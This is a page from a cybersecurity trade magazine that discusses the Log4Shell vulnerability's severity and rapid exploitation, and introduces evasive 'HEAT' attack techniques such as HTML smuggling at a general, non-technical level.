Page 116 - Cyber Defense eMagazine Special RSA Conference Annual Edition for 2022
P. 116

Ease of exploitation and HEAT

            A major problem with Log4j is not just the potential to cause immense damage…. Equally, it is relatively
            simple to exploit using Log4Shell.

            Given this combination, the National Institute of Standards and Technology (NIST) gave it a rare 10 out
            of 10 rating on its Common Vulnerability Scoring System (CVSS). With such a low bar for using the
            exploit, it can be leveraged by a wide range of attackers with malicious intent.

            This is demonstrated by the sheer volume of attacks that occurred once the vulnerability was made public.
            With the first exploitation attempt recorded within just nine minutes, a further 830,000 were made in the
            three days thereafter, prior to a patch being released.

            What is equally concerning is the fact that a proof-of-concept attack using the Log4j vulnerability had
            been detected eight days earlier, suggesting that the vulnerability was both known and possibly exploited
            prior to this time.

            Indeed, the evidence points to one outcome – that multiple attackers have successfully infiltrated various
            enterprise servers through the Log4Shell exploit.

            It is likely that they won't have given away any obvious sign of their successes. Instead, they will be
            probing networks and identifying where they can obtain the most value – or, in the eyes of their victims,
            inflict the most damage.

            This is a common trend amongst attackers, allowing them to extract the most value possible from their
            exploits.  The  infamous  and  devastating  SolarWinds  attack  affecting  US  government  agencies  and
            various Fortune 500 firms is a prime example, with the attackers having gained access to the company
            network nine months before an attack had been identified.

            Therefore, we expect to see several attacks stemming from the Log4j vulnerability to emerge throughout
            the entirety of 2022 and even beyond, with Highly Evasive Adaptive Threats (HEAT) being a critical tool
            in the arsenal of attackers that will enable them to conduct their works under the radar.

            HEAT attacks are defined by specific techniques used by attackers to evade existing security defences.
            With a full understanding of all the technology integrated into the existing security stack, threat actors are
            leveraging data obfuscation tactics such as HTML smuggling and Javascript obfuscation as mechanisms
            to avoid detection.

            HEAT  attacks  present  many  challenges  of  its  own  to  security  professionals.  Several  HEAT  attack
            characteristics actually serve useful purposes, and therefore can’t be blocked altogether. Instead, work
            arounds are needed to ensure that HEAT attacks are prevented.













                                                                                                            116
   111   112   113   114   115   116   117   118   119   120   121